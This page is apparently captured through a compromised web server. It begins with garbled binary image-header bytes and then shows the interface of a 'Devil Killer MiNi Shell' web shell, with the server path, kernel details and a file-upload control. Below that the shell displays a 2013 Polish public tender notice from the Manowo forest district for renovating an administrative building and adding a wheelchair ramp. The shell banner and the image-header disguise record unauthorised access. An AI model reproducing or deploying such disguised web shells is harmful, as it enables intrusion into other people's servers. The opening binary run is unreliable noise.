JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130215/63784-N-2013.html

<p class="kh_header"><b>Manowo: Przebudowa budynku administracyjnego i budowa podjazdu dla osób niepełnosprawnych w Manowie 54 nr.inw.105/00001.</b><br>
<b>Numer ogłoszenia: 63784 - 2013; data zamieszczenia: 15.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Manowo , Manowo 54, 76-015 Manowo, tel. 094 3183291, faks 094 3183281.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa PGL Lasy Państwowe Nadleśnictwo Manowo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku administracyjnego i budowa podjazdu dla osób niepełnosprawnych w Manowie 54 nr.inw.105/00001..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac :
dane budynku - charakterystyka:
- powierzchnia zabudowy 	- 335,63m2
- powierzchnia użytkowa 	- 582,02m2,
- kubatura 			- 2756,90m3 
- liczba kondygnacji           - 2
- powierzchnia działki w granicach opracowania - 4459,15m2
- parkingi istniejące            - 37 sztuk  miejsc postojowych

Wyposażenie w instalacje: 
- wentylacji grawitacyjnej, 
- instalację wodociągową i p-pożarową,
- instalację kanalizacyjną, 
- instalację odgromową,
- instalację elektryczną, 
- ogrzewanie c.o. - bez kotłowni
- klimatyzacyjną 
- komputerową, telefoniczną, alarmową
- instalację strukturalną 
Zakres prac:
ROZWIĄZANIA BUDOWLANE- wg projektu budowlanego przebudowy budynku administracyjnego.
Fundamenty.
Istniejące kamienne pod ścianami szczytowymi o szerokości ok 110cm, pod ścianami podłużnymi ok
50cm. Posadowienie poniżej strefy przemarzania gruntu na głębokości ok 130cm, bez izolacji poziomej
i pionowej.
Wody gruntowej nie zaobserwowano. Stan techniczny - dobry.
Ściany zewnętrzne
Istniejące ściany zewnętrzne wykonano z cegły ceramicznej pełnej gr. 35 - 90cm. Projekt przewiduje
renowację elewacji głównych (naprawa, uzupełnienia i oczyszczenie) wg projektu przebudowy budynku i SST. Renowację przewiduje się również dla istniejącej drewnianej werandy wejściowej w oparciu o szczegółowe wytyczne np. firmy REMERS lub rozwiązanie równoważne.
W celu określenia prawidłowej technologii renowacji powinno się pobrać próbki do analizy
chemicznej na zawartość szkodliwych dla budowli soli.
Czyszczenie elewacji.
Przewiduje się pozostawienie w procesie czyszczenia w stanie możliwie niezmienionym zewnętrznego
spieku cegły, zachowując częściowo jego naturalne w środowisku ściemnienie.
Wybór metody czyszczenia będzie zależał od inwestora i ewentualnego nadzoru konserwatorskiego.
Dodatkowym koniecznym zabiegiem uzupełniającym czyszczenie powinna być dezynfekcja,
usunięcie skażeń biologicznych.
Przed przystąpieniem do prac czyszczących należy zinwentaryzować miejsca skażone i po
mechanicznym usunięciu zanieczyszczeń nanieść przez natrysk lub pędzlem preparat biobójczy.
Renowacja wątku ceglanego.
Cegła.
Prace rozpocząć powinien przegląd elewacji. Szkodliwe i nieestetyczne naprawy cementowe należy
usunąć, a cegły nieodwracalnie uszkodzone mechanicznie zastąpić materiałem z
rozbiórek zbliżonym historycznie, o dobrych własnościach technicznych.
Spoina. 
Należy usunąć wyłącznie spoiny zdegradowane, spękane, odspojone od podłoża, jak i spoiny ze zniszczonych partii elewacji, które będą wymagały znacznych napraw lub rekonstrukcji. 
Korzystając z obszarów wykuwanych fug, należy rozważyć możliwości ukrycia w nich okablowania
istniejących lub nowoprojektowanych instalacji.
Hydrofobizacja elewacji ceglanej.
Dla ochrony całego obiektu przed niepożądanym wnikaniem wód opadowych i wilgoci z powietrza,
przewiduje się wykonanie na całości elewacji powyżej strefy cokołowej płaszcza hydrofobowego przy
użyciu preparatu krzemorganicznego. 
Kamień cokołowy.
Należy oczyścić metodą mechaniczną, ręcznie wykuwając wtórne naprawy oraz poprzez strumieniowanie mgławicowe odpowiednio dobranym ścierniwem wraz z usunięciem wszystkich napraw cementowych, osłabionych wykruszonych spoin, jak i wszelkich innych luźno związanych z podłożem fragmentów budulca oraz zabrudzeń. 
Renowacja drewnianej werandy.
Należy poprzedzić to pracami przygotowawczymi - powierzchnie drewna oczyścić, usunąć uszkodzone
nieodwracalnie elementy, sprawdzić stan połączeń konstrukcyjnych. Miejsca w których
nagromadziły się resztki zapraw i materiałów budowlanych oczyścić, tak by uzyskać
dostęp do jak największej powierzchni konstrukcji. Oczyszczenie ze starych powłok
powinno odbyć się poprzez prace mechaniczne, a więc szlifowanie papierem
drobnoziarnistym.  
Zabezpieczenie powłokowe - Aidol HK-Lasur - dekoracyjna, płynna lazura ochronna do drewna, do
zastosowań zewnętrznych lub równoważne. Stopień połysku: mat jedwabisty.
Ściany wewnętrzne.
Istniejące ściany wewnętrzne z cegły gr. od 12 - 25cm. Projektuje się fragmentaryczne
wyburzenia i zamurowania wg rys. rzutów parteru i poddasza.
3.4 Ściany działowe.
Projekt przewiduje częściowe wyburzenia niektórych istniejących ścianek ceglanych i lekkich szkieletowych oraz montaż lekkich ścianek działowych z płyt G-K wg systemu NIDA GIPS lub KNAUF.
3.5  Kominy
Istniejące kominy są w średnim stanie technicznym z mocno skorodowanymi tynkami
szczególnie w poddaszu, wymagające wymianę tynków i ekspertyzy kominiarskiej pod
względem drożności kanałów.
Przewody wentylacji grawitacyjnej wykonać z rur spiro, izolowane wełną mineralną w
obudowie z płyt G-K.
3.6Stropy
Nad parterem Istniejący strop drewniany w stanie technicznym dosyć dobrym.
Projekt przewiduje oczyszczenie z polepy, wymontowanie uzupełniającej belki
drewnianej pod płyty OSB gr. 22cm, oraz wypełnienie wełną mineralną. Od spodu
zabezpieczenie pożarowe w postaci sufitu podwieszonego 2x płyta G-K(F).
Strop nad poddaszem.
Istniejący drewniany wymaga częściowej wymiany i uzupełnieniu deskowania,
wypełnienia wełną mineralną oraz od spodu zabezpieczenia przeciwpożarowego
- 2x płyta G-K(F) - ognioodporna.
3.7 Podciągi, belki
Podciąg z belek stalowych nad wyburzanym otworem w ścianie nośnej wewnętrznej
Podłużnej, wykonać z belek stalowych 2I 160 PE
Nadproża z belek stalowych nad nowymi otworami w ścianach konstrukcyjnych zamontować z I120 PE 
Na poddaszu pod dwoma skróconymi słupami  środkowymi więźby dachowej.
ułożyć belki drewniane.
3.8 Schody
Istniejące schody zewnętrzne głównego wejścia betonowe - adoptowane.
Projekt przewiduje likwidację bocznego wejścia od strony PŁN - ZACH.
Granitowe stopnie po demontażu przenieść do projektowanego wyjścia z werandy
(pom. socjal.) od strony PŁD - WSCH.
Istniejące schody drewniane wewnętrzne do likwidacji. Projekt przewiduje wykonanie
schodów żelbetowych wg. rys. konstrukcyjnego, okładzina tych schodów z drewna liściastego przykręcanego do podłoża schodów, balustrady drewniane z drewna liściastego twardego,  oraz zachowania istniejących schodów prowadzących do kotłowni.
3.9 Dach
Projektuje się zamianę istniejącego pokrycia dachowego z blachy na dachówkę
ceramiczną, w kolorze grafitowym, a w części istniejącej nadbudowy od strony
PŁD - ZACH na gont bitumiczny.
3.10 Więźba dachowa
Projekt adaptuje istniejącą więźbę dachową, zalecając renowację, impregnację jej
elementów konstrukcyjnych. (Fobos M-4)
3.11 Podłogi
Parter : we wszystkich pomieszczeniach zamontować płytki terakotowe lub gres.
Poddasze : w pokojach biurowych i korytarzach panele podłogowe, w WC i
Pom. socjalnym płytki - gres.
3.12 Tynki
Tynki wewnętrzne - planowane - gipsowe oraz z płyt G-K. W pomieszczeniach
sanitarnych płytki gres do wysokości min. 2,0m.
Zewnętrzne w części nadbudówki cem - wap. Pokryte deskami na ruszcie drewnianym wg rys. szczegółowego
3.13 Malowanie
Farby akrylowe, emulsyjne wewnętrzne z certyfikatem B.
3.14 Parapety.
Zewnętrzne istniejące ceglane z przywróceniem pierwotnego wyglądu.
Na poddaszu w istniejącej części nadbudowanej w elewacji PŁD-ZACH.
z blachy cynkowej lub aluminiowej.
Wewnętrzne z PCV.
3.15 Okna, drzwi.
Okna, projektuje się wymianę wszystkich okien drewnianych parteru i częściowo
poddasza na PCV z zachowaniem podziału i proporcji drewnianych okien istniejących
wraz z rzeźbionym słupkami środkowymi. W poddaszu okna połaciowe z PVC lub alternatywnie równoważne z drewna.
Drzwi, projektuje się wymianę wszystkich istniejących na drewniane.
Istniejące drzwi wejściowe zewnętrzne do renowacji. Odtworzyć drewniane okiennice
w miejscach zachowanych na elewacji zawiasów i zasuwek okiennicowych.
3.15. Balustrady.
Balustrady projektowanych schodów żelbetowych wew. i zew. pochylni - stalowe wg
rys. szczegółowych.
3.16 Pokrycie blaszane.
Istniejące pokrycie blaszane nad werandą wejścia głównego zamienić na gont
bitumiczny (kolor grafitowy).
 Izolacje.
3.17 Izolacja ścian.
Projektuje się docieplenie ścian zewnętrznych ceglanych parteru i poddasza wewnątrz
pomieszczeń 6 cm twarda wełna mineralna na foli (paroizolacja) i 2x płyta G-K na
ruszcie drewnianym.
3.18 Izolacja dachów.
Izolację termiczną w płaszczyźnie połaci dachowych - 20cm wełna mineralna na foli
(paroizolacja).
3.19 Izolacja poddasza.
Izolację termiczną istniejącej nadbudowy poddasza : zewnętrznie - wełna mineralna
6cm na foli + deski drewniane gr. 2cm na ruszcie drewnianym do wysokości parapetów
Od wewnątrz pomieszczeń - wełna mineralna 6cm + 2x płyta G-K na foli i ruszcie
drewnianym. Wg rys. szczegółowego.
 Instalacje.
3.20 Instalacje sanitarne.
Kanalizacja sanitarna wg projektu instalacji sanitarnych.
Woda zimna, ciepła i cyrkulacja c.o wg projektu instalacji sanitarnych.
Hydrant P.Poż. wg projektu instalacji sanitarnych.
3.21 Instalacje elektryczne wg projektu instalacji elektrycznych.
Siłowa j.w.
Oświetlenia zewnętrznego j.w.
Odgromowa budynku j.w. 
Ochronna - sygnalizacji alarmowej przeciwwłamaniowe- wg projektu.
Komputerowa z serwerem - wg projektu instalacji elektrycznych.
Oświetleniowa j.w.
ROZWIĄZANIA BUDOWLANE- wg projektu budowlanego przebudowy budynku administracyjnego.
Szczegółowy opis i rozwiązania instalacji wod-kan, c.o. wentylacji i klimatyzacji oraz instalacji elektrycznych, strukturalnych i komputerowych , znajdują się w opisach technicznych projektów instalacyjnych, stanowiących załączniki do niniejszej specyfikacji.
Siłowa j.w.
Oświetlenia zewnętrznego j.w.
Odgromowa budynku j.w.
Ochronna - P.Poż.- wg projektu instalacji sanitarnych.
Komputerowa z serwerem - wg projektu instalacji elektrycznych.
3.22 Wentylacja i klimatyzacja - wg projektu instalacji sanitarnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w wysokości do 50% wartości na roboty objęte zamówieniem podstawowym w przypadku zaistnienia okoliczności uzasadnionych gospodarczym interesem Zamawiającego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokosci 40000,00 PLN. słownie cztrdzieści tysięcy złotych.Należy je wnosić zgodnie z SIWZ punkty 9.2 do 9.12.na zasadach określonych w Prawie Zamówień Publicznych art.45. Zwrot wadium na zasadach określonmych w art.46 pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 i 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 2 pkt 4 ustawy.(przed podpisaniem umowy zamawiający żądał będzie przedłożenia zaświadczenia o działalności gospodarczej).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia (załącznik nr 5).
Wykonawca winien wykazać, przynajmniej dwie roboty budowlane o wartości, co najmniej 800 tys. zł netto każda, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (załącznik nr 2).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia (załącznik nr 5).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia, tj., co najmniej jedną osobą uprawnioną do kierowania robotami budowlanymi w specjalnościach: konstrukcyjno-budowlanej, instalacyjno-inżynieryjnej w zakresie instalacji sanitarnych, instalacyjnej w zakresie instalacji i sieci elektrycznych bez ograniczeń .
 Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia (załącznik nr 3 oraz nr 5).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Zamawiający wymaga, aby Wykonawca w chwili składania oferty posiadał na rachunku bankowym kwotę, co najmniej 400 tys. zł lub posiadał zdolność kredytową w wysokości, przynajmniej 400 tys. zł. Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - przy czym suma ubezpieczenia nie może być niższa od kwoty min. 500 tys. zł. W razie przedłożenia informacji z kilku banków /rachunków/ informacje te muszą pochodzić z tego samego dnia i tej samej godziny. Wartość środków powinna być podana w PLN. W wypadku innych walut należy przyjąć przelicznik równy średniemu rocznemu kursowi Europejskiego Banku Centralnego. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia (załącznik nr 5).

W przypadku Wykonawców składających wspólną ofertę (np. konsorcjum) wszystkie powyższe warunki muszą być spełnione łącznie przez wszystkich Wykonawców.

6.3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

6.4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika - lidera, do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego - (przedłożyć umowę konsorcjum)

6.5. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w pkt 6.4.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

